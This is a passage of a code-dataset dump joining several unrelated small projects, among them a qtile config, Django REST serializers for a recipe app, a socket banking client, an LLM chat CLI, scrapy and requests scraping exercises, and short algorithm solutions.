lazy.window.bring_to_front()),\n]\n\ndgroups_key_binder = None\ndgroups_app_rules = [] # type: list\nfollow_mouse_focus = True\nbring_front_click = False\ncursor_warp = False\nfloating_layout = layout.Floating(\n float_rules=[\n *layout.Floating.default_float_rules,\n Match(wm_class=\"confirmreset\"), # gitk\n Match(wm_class=\"makebranch\"), # gitk\n Match(wm_class=\"maketag\"), # gitk\n Match(wm_class=\"ssh-askpass\"), # ssh-askpass\n Match(title=\"branchdialog\"), # gitk\n 
Match(title=\"pinentry\"), # GPG key password entry\n ]\n)\nauto_fullscreen = True\nfocus_on_window_activation = \"smart\"\nreconfigure_screens = True\n\nauto_minimize = True\n\nwl_input_rules = None\n\nwmname = \"LG3D\"\n\n######################################################################\n\n# __ _ ___ _ _ #\n# /\\ \\ \\ ___ (_) ____ / __\\ ___ __| |(_) _ __ __ _ #\n# / \\/ // _ \\ | ||_ /_____ / / / _ \\ / _` || || '_ \\ / _` | #\n# / /\\ /| (_) || | / /|_____|/ /___| (_) || (_| || || | | || (_| | #\n# \\_\\ \\/ \\___/ |_|/___| \\____/ \\___/ \\__,_||_||_| |_| \\__, | #\n# |___/ #\n\n######################################################################\n","repo_name":"NoizCode/config","sub_path":"qtile/config.py","file_name":"config.py","file_ext":"py","file_size_in_byte":8873,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"39"} +{"seq_id":"73918520755","text":"#!/usr/bin/env python\n# -*- coding:utf-8 -*-\n__author__ = 'Yuanqin Lu'\n\nclass Solution(object):\n def search(self, nums, target):\n \"\"\"\n :type nums: List[int]\n :type target: int\n :rtype: bool\n \"\"\"\n length = len(nums)\n left, right = 0, length-1\n while left <= right:\n mid = (left + right) / 2\n if nums[mid] == target:\n return True\n while left < mid and nums[left] == nums[mid]:\n left += 1\n if nums[left] <= nums[mid]:\n if nums[left] <= target < nums[mid]:\n right = mid - 1\n else:\n left = mid + 1\n else:\n if nums[mid] < target <= nums[right]:\n left = mid + 1\n else:\n right = mid - 1\n return False\n\n","repo_name":"lisabug/leetcode","sub_path":"Python/081_search_in_rotated_sorted_array_II.py","file_name":"081_search_in_rotated_sorted_array_II.py","file_ext":"py","file_size_in_byte":881,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"39"} +{"seq_id":"70158530034","text":"from socket import *\r\nimport PySimpleGUI as sg\r\nfrom time import sleep\r\n\r\n\r\nhost = gethostbyname(gethostname())\r\nport = 50000\r\n\r\n#conexão com o servidor\r\n\r\nclient = socket(AF_INET, SOCK_STREAM)\r\nclient.connect((host, port))\r\n\r\n#layout\r\n\r\nsoma = 0\r\nsaldo = 500\r\nfalha = 0\r\nopcao = 0\r\n\r\n\r\ndef menu():\r\n global opcao, saldo\r\n sg.theme('DarkGrey2')\r\n layout=[\r\n [sg.Text('Clique na opção desejada:', size = (20, 2), font=16)],\r\n [sg.Button('Depositar', size = (30, 1), font=16)],\r\n [sg.Button('Sacar', size=(30, 1), font=16)],\r\n [sg.Button('Ver saldo', size=(30, 1), font=16)],\r\n [sg.Button('Sair')]\r\n ]\r\n\r\n menu = sg.Window('Eagle Bank', layout=layout, finalize= True)\r\n\r\n while True:\r\n eventos, valores = menu.read()\r\n if eventos == 'Sair' or sg.WINDOW_CLOSED:\r\n sg.popup('Finalizando...')\r\n break\r\n if eventos == 'Ver saldo':\r\n saldo = float(saldo)\r\n sg.popup(f'Seu saldo atual é: R${saldo:.2f}')\r\n if eventos == 'Depositar':\r\n opcao = 1\r\n client.send(str(opcao).encode())\r\n menu.hide()\r\n depositar()\r\n menu.un_hide()\r\n if eventos == 'Sacar':\r\n opcao = 2\r\n client.send(str(opcao).encode())\r\n menu.hide()\r\n sacar()\r\n menu.un_hide()\r\n\r\n\r\n menu.close()\r\n\r\n\r\ndef login():\r\n global soma\r\n sg.theme('DarkGrey2')\r\n layout = [\r\n [sg.Text('CPF', size = (11,1), font = 16)],\r\n [sg.InputText(key='login', font=10)],\r\n [sg.Text('Senha', size = (11, 1), font = 16)],\r\n [sg.InputText(key='senha', password_char= '*', font=10)],\r\n [sg.Button('Entrar'), sg.Button('Sair')]\r\n ]\r\n login = sg.Window('Eagle Bank', layout=layout, finalize=True)\r\n\r\n while 
True:\r\n eventos, valores = login.read()\r\n if eventos == 'Sair':\r\n sg.popup('Encerrando.')\r\n null = '0'\r\n client.send(null.encode())\r\n client.send(null.encode())\r\n break\r\n if eventos == 'Entrar':\r\n username = valores['login']\r\n password = valores['senha']\r\n client.send(username.encode())\r\n client.send(password.encode())\r\n msg = client.recv(1024).decode()\r\n if msg == 'Logado com sucesso':\r\n sg.popup('Autenticação concluída!')\r\n login.hide()\r\n menu()\r\n break\r\n elif msg != 'Logado com sucesso':\r\n sg.popup('Credenciais incorretas!')\r\n soma = soma + 1\r\n if soma == 3:\r\n sg.popup('Número de tentativas excedido. \\n Finalizando...')\r\n sleep(1.5)\r\n client.close()\r\n break\r\n login.close()\r\n\r\n\r\ndef depositar():\r\n global saldo\r\n sg.theme('DarkGrey2')\r\n layout=[\r\n [sg.Text('Valor a ser depositado: ', size=(16,1), font=16)],\r\n [sg.InputText(key='valor', font=11)],\r\n [sg.Button('Confirmar'), sg.Button('Voltar')],\r\n ]\r\n\r\n depositar = sg.Window('Eagle Bank', layout=layout, finalize = True)\r\n\r\n while True:\r\n eventos, valores = depositar.read()\r\n if 'Confirmar':\r\n valor = valores['valor']\r\n client.send(valor.encode())\r\n valor = client.recv(1024).decode()\r\n valor = float(valor)\r\n saldo = valor\r\n sg.popup(f'Valor em conta atualizado: R${valor:.2f}')\r\n break\r\n depositar.close()\r\n\r\n\r\ndef sacar():\r\n global saldo, valor\r\n sg.theme('DarkGrey2')\r\n layout=[\r\n [sg.Text('Valor a ser sacado: ', size=(10,1), font=16)],\r\n [sg.Input(key='valor', font=11)],\r\n [sg.Button('Confirmar'), sg.Button('voltar')]\r\n ]\r\n\r\n sacar = sg.Window('Eagle Bank', layout=layout, finalize=True)\r\n\r\n while True:\r\n eventos, valores = sacar.read()\r\n if eventos == 'Confirmar':\r\n valor = valores['valor']\r\n client.send(valor.encode())\r\n print(saldo)\r\n saldo = client.recv(1024).decode()\r\n print(saldo)\r\n saldo = float(saldo)\r\n print(saldo)\r\n sg.popup(f'Seu saldo atualizado é de R${saldo}')\r\n break\r\n sacar.close()\r\n\r\n\r\n#criar um bloco de leitura de eventos\r\nlogin()\r\n\r\n","repo_name":"Ekaly/vscode","sub_path":"Cliente.py","file_name":"Cliente.py","file_ext":"py","file_size_in_byte":4419,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"39"} +{"seq_id":"3318258404","text":"from django.urls import path\nfrom .views import AddStudentView, DetectionView, UpdateStudentImageView, DeleteStudentView, TrainView\n\nurlpatterns = [\n path('create-student', AddStudentView.as_view()),\n path('update-student-image', UpdateStudentImageView.as_view()),\n path('delete-student', DeleteStudentView.as_view()),\n path('train', TrainView.as_view()),\n path('detect', DetectionView.as_view())\n]\n","repo_name":"ruizhiwang11/face_reco_attendence_system","sub_path":"backend/face_reco_attendence_system/api/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":414,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"39"} +{"seq_id":"36926069312","text":"############################\n# LESSON MAKER FOR STUYCCC #\n############################\n\n########## The lesson maker syntax ##########\n#\n# First line should be lesson title\n# Text without preceding formatter will be treated as plaintext in a
<p> tag\n# A blank line will be treated as a <br> tag\n#\n# Open an ordered list with \"!!olist!!\"\n# Close an ordered list with \"!!endolist!!\"\n#\n# Open an unordered list with \"!!ulist!!\"\n# Close an unordered list with \"!!endulist!!\"\n#\n# Add an image with \"image(<url>)\" --> absolute dir, not relative\n#\n# Add a link with \"a[<text>](<url>)\"\n#\n# Add your own custom html between \"!!html!!\" and \"!!endhtml!!\"\n#\n# start a heading with !!h<n>!!. It will be one line\n#\n# <, >, &, and TABs will automatically be replaced with their html equivalents\n#\n# For spacing, use !!breaks!!<n>, <n> being the number of breaks you want\n#\n# others shall be added l8r\n#\n#############################################\n\nimport re\n\ndef go():\n #take filename input and read it\n f = input(\"Input filename: \")\n straw = open(f, 'r')\n pretext = straw.read()\n straw.close()\n\n #start html file\n html = \"\"\n\n #replace >, <, &, and TABs with their html entities\n pretext = pretext.replace('&', '&amp;')\n pretext = pretext.replace('\\t', '&emsp;')\n pretext = pretext.replace('<', '&lt;')\n pretext = pretext.replace('>', '&gt;')\n\n #fill in html\n pretext = pretext.split('\\n')\n\n html += '<h1>' + pretext[0] + '</h1>\\n' #adds title\n\n in_list = False #will be true if in olist --> precedes every element with <li>\n in_html = False #will be true if user is adding custom html --> will ignore all steps and paste users html in file\n\n for i in pretext[1:]:\n if i[:10] == '!!breaks!!':\n num = int(i[10:])\n html += '<br>\\n' * num\n continue\n if in_html:\n if i != '!!endhtml!!':\n html += i.replace('&gt;', '>').replace('&lt;', '<').replace('&emsp;', '\\t').replace('&amp;', '&') + '\\n'\n else:\n in_html = False\n continue\n if in_list:\n if i != '!!endulist!!' and i != '!!endolist!!':\n html += '<li>' + i + '</li>\\n'\n else:\n if i == '!!endulist!!':\n html += '</ul>\\n\\n'\n else:\n html += '</ol>\\n\\n'\n in_list = False\n continue\n if i == '':\n html += '<br>\\n'\n continue\n\n #check for list\n x = re.match(r'!![a-zA-Z]*!!', i)\n if x != None:\n found = x.group()\n\n #ordered lists\n if found.strip('!') == 'olist':\n html += '\\n<ol>\\n'\n in_list = True\n\n #unordered lists\n elif found.strip('!') == 'ulist':\n html += '\\n<ul>\\n'\n in_list = True\n\n #custom html\n elif found.strip('!') == 'html':\n in_html = True\n\n #anything else\n else:\n html += '<p>' + found + '</p>\\n'\n continue\n\n #check for img url\n x = re.match(r'image\\(https?://.*\\)', i)\n if x != None:\n html += '<img src=\"' + i[6:-1] + '\">\\n'\n continue\n\n #check for hyperlink\n x = re.match(r'a\\[.*\\]\\(https*://.*\\)', i)\n if x != None:\n full = x.group()\n inner_text = re.search(r'\\[.*\\]', full).group()[1:-1]\n url = re.search(r'\\(https*://.*\\)', full).group()[1:-1]\n html += '<a href=\"' + url + '\">' + inner_text + '</a>\\n'\n continue\n\n #check for heading\n x = re.search(r'!!h\\d!!', i)\n if x != None and x.end() == 6:\n tier = x.group().strip('!h')\n html += '<h' + tier + '>' + i[6:] + '</h' + tier + '>\\n\\n'\n continue\n\n\n #if nothing else worked\n html += '<p>' + i + '</p>
        \\n'\n\n if in_list:\n html += '\\n'\n\n html += \"\"\n\n straw = open(f.rsplit('.', 1)[0] + '.html', 'w')\n straw.write(html)\n straw.close()\n\n print(\"Wrote to \" + f.rsplit('.', 1)[0] + \".html\")\n\n\ngo()\n","repo_name":"JoanChirinos/StuyCCC","sub_path":"Lessons/lessonMaker.py","file_name":"lessonMaker.py","file_ext":"py","file_size_in_byte":4371,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"39"} +{"seq_id":"24791638087","text":"import base64\n\nfrom django.core.files.base import ContentFile\nfrom django.shortcuts import get_object_or_404\nfrom recipes.models import (Favorite, Follow, Ingredient, IngredientInRecipe,\n Recipe, ShoppingCart, Tag, )\nfrom rest_framework import serializers\nfrom rest_framework.serializers import ModelSerializer\n\nfrom users.models import User\n\n\nclass Base64ImageField(serializers.ImageField):\n\n def to_internal_value(self, data):\n \"\"\"Преобразование ка��тинки\"\"\"\n\n if isinstance(data, str) and data.startswith('data:image'):\n format, imgstr = data.split(';base64,')\n ext = format.split('/')[-1]\n data = ContentFile(base64.b64decode(imgstr), name='photo.' + ext)\n\n return super().to_internal_value(data)\n\n\nclass TagSerializer(ModelSerializer):\n \"\"\"Вывод тэгов.\"\"\"\n\n class Meta:\n model = Tag\n fields = ('id', 'name', 'color', 'slug')\n\n\nclass IngredientSerializer(ModelSerializer):\n \"\"\"вывод ингредиентов.\"\"\"\n\n class Meta:\n model = Ingredient\n fields = ('id', 'name', 'measurement_unit')\n\n\nclass UsersSerializer(serializers.ModelSerializer):\n \"\"\"\n Сериализатор выдачи информации о user.\n \"\"\"\n is_subscribed = serializers.SerializerMethodField()\n\n class Meta:\n model = User\n fields = (\n 'id',\n 'username',\n 'email',\n 'first_name',\n 'last_name',\n 'is_subscribed'\n )\n\n def get_is_subscribed(self, obj):\n \"\"\"\n Проверка на подписку.\n \"\"\"\n user_me = self.context['request'].user\n if not user_me.is_authenticated:\n return False\n return user_me.follower.filter(author=obj).exists()\n\n\nclass IngredientInRecipeSerializer(serializers.ModelSerializer):\n id = serializers.ReadOnlyField(source='ingredient.id')\n name = serializers.ReadOnlyField(source='ingredient.name')\n measurement_unit = serializers.ReadOnlyField(\n source='ingredient.measurement_unit')\n\n class Meta:\n model = IngredientInRecipe\n fields = ('id', 'name', 'measurement_unit', 'amount')\n\n\nclass RecipeViewSerializer(serializers.ModelSerializer):\n tags = TagSerializer(many=True)\n author = UsersSerializer()\n ingredients = IngredientInRecipeSerializer(\n source='ingredient_list', many=True)\n is_favorited = serializers.SerializerMethodField()\n is_in_shopping_cart = serializers.SerializerMethodField()\n\n class Meta:\n model = Recipe\n fields = (\n 'id',\n 'tags',\n 'author',\n 'ingredients',\n 'is_favorited',\n 'is_in_shopping_cart',\n 'name',\n 'image',\n 'text',\n 'cooking_time',\n )\n\n def get_is_favorited(self, obj):\n \"\"\"Проверка на добавление в избранное.\"\"\"\n\n request = self.context['request'].user\n if not request.is_authenticated:\n return False\n return Favorite.objects.filter(\n user=request, recipe=obj\n ).exists()\n\n def get_is_in_shopping_cart(self, obj):\n \"\"\"проверка на наличие в корзине.\"\"\"\n\n request = self.context['request'].user\n if not request.is_authenticated:\n return False\n return ShoppingCart.objects.filter(\n user=request, recipe=obj\n ).exists()\n\n\nclass RecipeSerializer(serializers.ModelSerializer):\n \"\"\"\n Сериализатор для 
выдачи рецепта(ов) с общей информацией.\n \"\"\"\n\n class Meta:\n model = Recipe\n fields = (\n 'id',\n 'name',\n 'image',\n 'cooking_time'\n )\n\n\nclass CreateIngredientsInRecipeSerializer(serializers.ModelSerializer):\n \"\"\"Сериализатор для ингредиентов в рецептах\"\"\"\n\n id = serializers.IntegerField()\n amount = serializers.IntegerField()\n\n @staticmethod\n def validate_amount(value):\n \"\"\"Валидация количества\"\"\"\n\n if value < 1:\n raise serializers.ValidationError(\n 'Количество ингредиента должно быть больше 0!'\n )\n return value\n\n class Meta:\n model = IngredientInRecipe\n fields = ('id', 'amount')\n\n\nclass CreateRecipeSerializer(serializers.ModelSerializer):\n \"\"\"Создание рецептов\"\"\"\n\n ingredients = CreateIngredientsInRecipeSerializer(many=True)\n tags = serializers.PrimaryKeyRelatedField(\n many=True, queryset=Tag.objects.all()\n )\n image = Base64ImageField(use_url=True)\n\n class Meta:\n model = Recipe\n fields = ('ingredients', 'tags', 'name',\n 'image', 'text', 'cooking_time')\n\n def to_representation(self, instance):\n \"\"\"Представление модели\"\"\"\n\n serializer = RecipeViewSerializer(\n instance,\n context={\n 'request': self.context.get('request')\n }\n )\n return serializer.data\n\n def validate(self, data):\n \"\"\"Валидация ингредиентов\"\"\"\n\n ingredients = self.initial_data.get('ingredients')\n lst_ingredient = []\n\n for ingredient in ingredients:\n if ingredient['id'] in lst_ingredient:\n raise serializers.ValidationError(\n 'Ингредиенты должны быть уникальными!'\n )\n lst_ingredient.append(ingredient['id'])\n return data\n\n def recipe_create_or_update(self, instance, validated_data):\n \"\"\"\n Метод для создания или обновления ингредиентов и тегов.\n \"\"\"\n ingredients, tags = (\n validated_data.pop('ingredients'), validated_data.pop('tags')\n )\n for item in ingredients:\n cur_obj, _ = IngredientInRecipe.objects.get_or_create(\n recipe=instance,\n ingredient=get_object_or_404(Ingredient, pk=item['id']),\n amount=item['amount']\n )\n for item in tags:\n instance.tags.add(item)\n\n return instance\n\n def create(self, validated_data):\n raw_data = {\n 'ingredients': validated_data.pop('ingredients'),\n 'tags': validated_data.pop('tags')\n }\n recipe = Recipe.objects.create(**validated_data)\n return self.recipe_create_or_update(recipe, raw_data)\n\n def update(self, instance, validated_data):\n instance.ingredients.clear()\n instance.tags.clear()\n instance = self.recipe_create_or_update(instance, validated_data)\n return super().update(instance, validated_data)\n\n\nclass FavoriteSerializer(serializers.ModelSerializer):\n \"\"\"\n Сериализатор для выдачи избранных рецептов.\n \"\"\"\n\n class Meta:\n model = Favorite\n fields = (\n 'user',\n 'recipe'\n )\n\n def validate(self, data):\n if Favorite.objects.filter(\n user=data['user'],\n recipe=data['recipe']\n ):\n raise serializers.ValidationError(\n f'Рецепт - {data[\"recipe\"]} уже есть в избранном'\n )\n return data\n\n def to_representation(self, instance):\n return RecipeSerializer(instance.recipe).data\n\n\nclass FollowSerializer(UsersSerializer):\n \"\"\"\n Сериализатор для выдачи подписок.\n \"\"\"\n recipes_count = serializers.SerializerMethodField()\n recipes = serializers.SerializerMethodField()\n\n class Meta:\n model = User\n fields = (\n 'id',\n 'username',\n 'email',\n 'first_name',\n 'last_name',\n 'is_subscribed',\n 'recipes',\n 'recipes_count'\n )\n\n def get_recipes(self, author):\n \"\"\"\n При наличии в параметрах запроса recipes_limit происходит\n выдача 
среза списка с ингредиентами.\n \"\"\"\n request = self.context.get('request')\n recipes_limit = request.query_params.get('recipes_limit')\n if recipes_limit:\n return RecipeSerializer(\n Recipe.objects.filter(author=author)[:int(recipes_limit)],\n context={'queryset': request},\n many=True\n ).data\n return RecipeSerializer(\n Recipe.objects.filter(author=author),\n context={'queryset': request},\n many=True\n ).data\n\n def get_recipes_count(self, obj):\n \"\"\"\n Подсчет количества рецептов автора.\n \"\"\"\n return obj.recipes.count()\n\n\nclass FollowPostSerializer(serializers.ModelSerializer):\n \"\"\"\n Сериализатор для создание запроса на подписку.\n \"\"\"\n\n class Meta:\n model = Follow\n fields = (\n 'author',\n 'user'\n )\n\n def validate(self, data):\n user_me = self.context['request'].user\n if user_me == data['author']:\n raise serializers.ValidationError(\n 'Нельзя подписываться на самого себя!'\n )\n if Follow.objects.filter(\n author=data['author'],\n user=user_me):\n raise serializers.ValidationError(\n f'Вы подписаны на автора {data[\"author\"]}!'\n )\n return data\n\n def to_representation(self, instance):\n return FollowSerializer(\n instance.author,\n context={'request': self.context.get('request')}\n ).data\n\n\nclass ShoppingCartSerializer(serializers.ModelSerializer):\n \"\"\"\n Сериализатор для списка покупок автора.\n \"\"\"\n\n class Meta:\n model = ShoppingCart\n fields = (\n 'user',\n 'recipe'\n )\n\n def validate(self, data):\n if ShoppingCart.objects.filter(\n user=data['user'],\n recipe=data['recipe']\n ):\n raise serializers.ValidationError(\n f'Рецепт - {data[\"recipe\"]} уже есть в списке покупок'\n )\n return data\n\n def to_representation(self, instance):\n return RecipeSerializer(instance.recipe).data\n","repo_name":"ElenaAntonenko/foodgram-project-react","sub_path":"backend/api/serializer.py","file_name":"serializer.py","file_ext":"py","file_size_in_byte":10757,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"39"} +{"seq_id":"72706654194","text":"'''\nHow to reverse an integer\n\nDesign an efficient algorithm to reverse a given integer.\n\nExample:\n\ninput: 1234\noutput: 4321\n'''\n\n# Use the module operator to collect the last digit\n# Then use integer division to delete the last digit\n# build the new integer up tens-place by tens-place\ndef reverse_integer(n: int) -> int:\n reverse = 0\n remainder = 0\n \n while (n > 0):\n remainder = n % 10\n n = n // 10\n reverse = reverse * 10 + remainder\n return reverse\n\nif __name__ == '__main__':\n print(reverse_integer(12345678))","repo_name":"EandrewJones/algorithms","sub_path":"interview_questions/arrays/reverse_integer.py","file_name":"reverse_integer.py","file_ext":"py","file_size_in_byte":554,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"39"} +{"seq_id":"28124967662","text":"# coding=utf-8\n# Implements stream chat in command line for fine-tuned models.\n# Usage: python cli_demo.py --model_name_or_path path_to_model --checkpoint_dir path_to_checkpoint\n\n\nfrom utils import (\n Template,\n load_pretrained,\n prepare_infer_args,\n get_logits_processor\n)\nfrom threading import Thread\nfrom transformers import TextIteratorStreamer\n\n\ndef main():\n\n model_args, data_args, finetuning_args, generating_args = prepare_infer_args()\n # model_name = \"BLOOM\" if \"bloom\" in model_args.model_name_or_path else \"LLaMA\"\n model_name = \"仲景\"\n model, tokenizer = load_pretrained(model_args, finetuning_args)\n\n 
prompt_template = Template(data_args.prompt_template)\n streamer = TextIteratorStreamer(tokenizer, timeout=60.0, skip_prompt=True, skip_special_tokens=True)\n\n def predict_and_print(query, history: list):\n input_ids = tokenizer([prompt_template.get_prompt(query, history)], return_tensors=\"pt\")[\"input_ids\"]\n input_ids = input_ids.to(model.device)\n\n gen_kwargs = generating_args.to_dict()\n gen_kwargs[\"input_ids\"] = input_ids\n gen_kwargs[\"logits_processor\"] = get_logits_processor()\n gen_kwargs[\"streamer\"] = streamer\n\n thread = Thread(target=model.generate, kwargs=gen_kwargs)\n thread.start()\n response = \"\"\n print(\"{}: \".format(model_name), end=\"\")\n for new_text in streamer:\n print(new_text, end=\"\", flush=True)\n response += new_text\n print()\n history = history + [(query, response)]\n return history\n\n history = []\n print(\"欢迎使用 {} 模型,输入内容即可对话,clear清空对话历史,stop终止程序\".format(model_name))\n while True:\n try:\n query = input(\"\\nInput: \")\n except UnicodeDecodeError:\n print(\"Detected decoding error at the inputs, please set the terminal encoding to utf-8.\")\n continue\n except Exception:\n raise\n\n if query.strip() == \"stop\":\n break\n\n if query.strip() == \"clear\":\n history = []\n print(\"History has been removed.\")\n continue\n\n history = predict_and_print(query, history)\n\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"Zlasejd/HuangDI","sub_path":"src/cli_demo.py","file_name":"cli_demo.py","file_ext":"py","file_size_in_byte":2264,"program_lang":"python","lang":"en","doc_type":"code","stars":27,"dataset":"github-code","pt":"39"} +{"seq_id":"10611437673","text":"#Change user-agent to anything appropriate\n# Get links of reference webpages stored in a .json file\n#print out image links from given url\nimport scrapy\nfrom scrapy.crawler import CrawlerProcess\nimport re\nimport requests \n\n######## TASK 5\n#modded useragent\nfakeuseragent = { 'User-Agent': \"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.97 Safari/537.36 AppleWebKit/537.36 (KHTML, like Gecko)\"}\nmoduseragent = { 'user-Agent':\"Mobile\"}\n\n#set target webpage\nurl = 'http://172.18.58.238/headers.php'\n\n##\ndef Task5():\n\n #GET\n r = requests.Session()\n request = r.get(url, headers=fakeuseragent)\n statusCode = request.status_code\n #header\n header = request.headers\n\n #to change header type to mobile\n header.update(moduseragent)\n new_request = r.get(url, headers=header)\n\n\n Task5File = open(\"task5.txt\", \"w\")\n Task5File.write(f\"{request.status_code}\\n{header}\\n$$$ Modded: \\n{moduseragent}\\n{new_request.headers}\")\n\n if statusCode == 200:\n print(\"OK\")\n else:\n print(\"Error status code: %s\"%statusCode)\n print(\"\\n$$$ Modded: \\n\", moduseragent)\n print(new_request.headers)\n\nclass parseTask6(scrapy.Spider):\n\n name = 'task6'\n #test url\n start_urls = ['http://172.18.58.238/index.php']\n open(\"task6.json\", 'w').close()\n def parse(self, response):\n Task6 = open(\"task6.json\", 'a')\n for link in response.css('a'):\n link_results = link.css('a::attr(href)').get()\n Task6.write(str({'results': link_results})+\"\\n\")\n Task6.close()\n\n#image urls extractions\nclass parseImages(scrapy.Spider):\n img_list=[]\n name = 'task7'\n allowed_domains = ['172.18.58.238']\n \n start_urls = ['http://172.18.58.238/index.php']\n \n \n def parse(self, response):\n url = response.url \n for i in response.css('img::attr(src)').extract():\n if '.jpg':\n self.img_list.append(url + i)\n \n for u in 
response.css('img::attr(src)').extract():\n if u is not None:\n yield response.follow(u, callback=self.parse)\n\n \n\n print(img_list)\n \n \nTask5()\nprocess = CrawlerProcess()\nprocess.crawl(parseTask6)\nprocess.crawl(parseImages)\nprocess.start()","repo_name":"BAPESHOTZ/REPO-STUFFZ","sub_path":"scrapy.py","file_name":"scrapy.py","file_ext":"py","file_size_in_byte":2280,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"39"} +{"seq_id":"30315625650","text":"import re\nimport os\n\n\n#classified tweets according to hashtag\ndef isLeave(filename):\n\tleavePath = './labeled_tweets/leave'\n\tleaveTweets = open(leavePath, 'a')\n\tglobal leaveCnt\n\n\tremainPath = './labeled_tweets/remain'\n\tremainTweets = open(remainPath, 'a')\n\tglobal remainCnt\n\n\tsourcePath = './tweets_by_month/' + filename\n\n\twith open(sourcePath) as f:\n\t\tfor line in f:\n\t\t\tline = line.lower()\n\t\t\tline = re.sub(r'\\|\\~|\\`|\\!|\\$|\\%|\\^|\\&|\\*|\\(|\\)|\\-|\\_|\\+|\\=|\\||\\\\|\\[|\\]|\\{|\\}|\\;|\\:|\\\"|\\'|\\,|\\<|\\.|\\>|\\/|\\?', \" \", line)\n\t\t\tif re.search('#voteleave|#leave|#takecontrol|#leaveeu', line):\n\t\t\t\tleaveTweets.write(line)\n\t\t\t\tleaveCnt = leaveCnt + 1\n\t\t\tif re.search('#voteremain|#remain|#strongerin|#labourinforbritain|#intogether', line):\n\t\t\t\tremainTweets.write(line)\n\t\t\t\tremainCnt = remainCnt + 1\n\nif __name__=='__main__':\n\n\tleaveCnt = 0\n\tremainCnt = 0\n\tpath = './tweets_by_month/'\n\tfor root, dirs, files in os.walk(path):\n\t\tfor filename in files:\n\t\t\tisLeave(filename)\n\tprint(leaveCnt)\n\tprint(remainCnt)\n\n\n","repo_name":"BrexitProject/TweetsMining","sub_path":"isLeave.py","file_name":"isLeave.py","file_ext":"py","file_size_in_byte":994,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"39"} +{"seq_id":"18633326936","text":"import os\nimport utils\nimport confmat\n\n\ndef quality_score(tp, tn, fp, fn):\n score = (tp + tn)/(tp + tn + 10*fp + fn)\n print(f\"found {tp} spams out of {tp+fn}, found {tn} hams out of {tn+fp}\")\n return score\n\n\ndef compute_quality_for_corpus(path):\n truth_dict = utils.read_classification_from_file(\n os.path.join(path, '!truth.txt'))\n pred_dict = utils.read_classification_from_file(\n os.path.join(path, '!prediction.txt'))\n cm = confmat.BinaryConfusionMatrix(pos_tag='SPAM', neg_tag='OK')\n cm.compute_from_dicts(truth_dict, pred_dict)\n return quality_score(**cm.as_dict())\n\n\nif __name__ == \"__main__\":\n print(compute_quality_for_corpus(os.path.join(\"data\", \"1\")))\n","repo_name":"radkop2000/SpamFilter","sub_path":"quality.py","file_name":"quality.py","file_ext":"py","file_size_in_byte":704,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"39"} +{"seq_id":"24375269217","text":"'''\r\n1. 
Развернуть у себя на компьютере/виртуальной машине/хостинге MongoDB и реализовать функцию,\r\nзаписывающую собранные вакансии в созданную БД.\r\n'''\r\n\r\nimport requests\r\nfrom bs4 import BeautifulSoup as bs\r\nimport pandas as pd\r\nimport csv\r\nfrom pymongo import MongoClient\r\n\r\nheader = {'User-Agent':'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.130 Safari/537.36'}\r\n\r\n\r\ndef get_data(zp):\r\n resp = requests.get(f'https://www.rabota.ru/?sort=relevance&min_salary={zp}', headers=header)\r\n soup = bs(resp.text, 'lxml')\r\n result = []\r\n w = soup.find_all(class_=\"vacancy-preview-card__title\")\r\n p = soup.find_all(class_=\"vacancy-preview-card__salary vacancy-preview-card__salary-blue\")\r\n for i in range(20):\r\n result.append({\r\n 'Вакансия': w[i].text.strip(),\r\n 'Зарплата': p[i].text.strip().replace('\\xa0', ' ')\r\n })\r\n print(result[i])\r\n pd.DataFrame(result).to_csv('dump.csv')\r\n\r\n\r\ndef to_mongo():\r\n client = MongoClient('localhost')\r\n db = client[\"test01\"]\r\n col = db[\"work\"]\r\n with open('dump.csv', 'r', encoding='utf-8') as read_obj:\r\n csv_reader = csv.DictReader(read_obj)\r\n mylist = csv_reader\r\n col.insert_many(mylist)\r\n\r\n\r\nget_data(80000) # Требуемая зарплата\r\nto_mongo()\r\n\r\n\r\n\r\n\r\n\r\n\r\n","repo_name":"softicer-67/PARSING","sub_path":"Lesson_3/1.py","file_name":"1.py","file_ext":"py","file_size_in_byte":1489,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"39"} +{"seq_id":"1698504564","text":"# 1.3\n# URLify: Write a method to replace all spaces in a string with '%20'.\n# You may assume that the string has sufficient space at the end to hold the additional characters,\n# and that you are given the \"true\" length of the string.\n\n# using an additional data structure - O(n) time, O(n) space\ndef URLify(input_str, n):\n url_string = \"\"\n\n for i in range(n):\n if (input_str[i] == ' '):\n url_string += \"%20\"\n else:\n url_string += input_str[i]\n\n return url_string\n\nassert(URLify(\"Mr John Smith \", 13) == \"Mr%20John%20Smith\")\n\n# in-place - O(n) time, O(1) space\ndef URLify2(input_str, n):\n space_count = 0\n\n for i in range(n - 1, -1, -1):\n if (input_str[i] == ' '):\n space_count += 1\n\n shift = space_count * 2\n \n for i in range(n - 1, -1, -1):\n if (input_str[i] == ' '):\n input_str[i + shift] = '0'\n input_str[i + shift - 1] = '2'\n input_str[i + shift - 2] = '%'\n shift -= 2\n else:\n input_str[i + shift] = input_str[i]\n\n return input_str\n\n# because Python strings are immutable, a list is inputted instead of a string\nassert(URLify2(list(\"Mr John Smith \"), 13) == list(\"Mr%20John%20Smith\")) 